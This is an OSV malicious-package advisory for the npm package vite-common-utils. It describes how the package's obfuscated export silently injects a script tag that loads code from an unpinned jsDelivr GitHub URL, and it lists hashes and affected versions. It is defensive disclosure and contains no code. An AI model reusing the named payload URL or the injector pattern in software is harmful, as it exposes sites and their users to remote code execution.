MAL-2026-6088
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/vite-common-utils/MAL-2026-6088.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-6088
- Published
- 2026-06-17T22:33:52Z
- Modified
- 2026-06-17T22:46:51.950397306Z
- Summary
- Malicious code in vite-common-utils (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (b1d3397d754ffeb3726496769b2f159ce8596b2233b5875afa8f7fbca29ed0fd)
The package presents itself as a Vite utility library but its only export, loadFilbetScriptSilently, creates a <script> element whose src is hardcoded to https://cdn.jsdelivr.net/gh/gongben2024/network-security@main/src/filbet.js and appends it to document.documentElement, causing the consuming application to fetch and execute whatever JavaScript that URL currently serves. The URL is unpinned (mutable @main branch), is hosted under a personal GitHub user account unrelated to the package publisher, and has no integrity/SRI check. The shipped dist/index.js is the only file in the package and is heavily mangled with obfuscator.io (string-array decoder, hex identifiers, rotation loop), and package.json's devDependencies include gulp-javascript-obfuscator — confirming the obfuscation is intentional and hides the injector. The export name suffixed 'Silently', the cover-story package name, the obfuscation, and the off-publisher mutable code source jointly indicate a remote-code-execution dropper aimed at the downstream web application's origin and its users.
- Database specific
{ "malicious-packages-origins": [ { "sha256": "1cee011bd6bf55f3c74e2e42c15a9df8f1f7974308da228087ba019c3e5cd831", "import_time": "2026-06-17T22:38:22.614222187Z", "source": "amazon-inspector", "modified_time": "2026-06-17T22:33:58Z", "versions": [ "1.0.5" ], "id": "IN-MAL-2026-006958" }, { "id": "IN-MAL-2026-006956", "import_time": "2026-06-17T22:38:22.387689707Z", "sha256": "b1d3397d754ffeb3726496769b2f159ce8596b2233b5875afa8f7fbca29ed0fd", "modified_time": "2026-06-17T22:33:52Z", "source": "amazon-inspector", "versions": [ "1.0.4" ] }, { "id": "IN-MAL-2026-006957", "versions": [ "1.0.3" ], "import_time": "2026-06-17T22:38:22.509457726Z", "modified_time": "2026-06-17T22:33:53Z", "sha256": "c989aa0727b9dd8a6ee9cc42b851dcea293df2ea4129284d43b4476461d91bcb", "source": "amazon-inspector" } ] }- References
- Credits
-
-
- Amazon Inspector - FINDER
-
Affected packages
npm / vite-common-utils
Package
- Name
- vite-common-utils
- View open source insights on deps.dev
- Purl
- pkg:npm/vite-common-utils
Database specific
indicators
{
"package_integrity": [
{
"filename": "vite-common-utils-1.0.5.tgz",
"hashes": {
"sha512_sri": "sha512-lEZIrcfysLQ4EKuiQzhUnJ5qFZb49pe6maCNWW3yqCSYWZ5StX5fGEITNqYq1I88ylnUcsgFIAH9IwXYJbeaxQ==",
"sha1": "0375e5987c718eaca90a7297d0a3e2561014da32"
}
}
],
"evidence_files": [
{
"sha256": "f0ab475fbfa816f3a76bd4c314c16999ab9f8d349147605b4b083f7b29fe6a29",
"tlsh": "18313a952d40ad9063964fbe7677f1d8c266dc7e28d508c9e0a979c87d20a30f4e2774",
"path": "dist/index.js"
}
]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/vite-common-utils/MAL-2026-6088.json"
cwes
[
{
"name": "Embedded Malicious Code",
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature."
},
{
"name": "Embedded Malicious Code",
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature."
},
{
"name": "Embedded Malicious Code",
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature."
}
]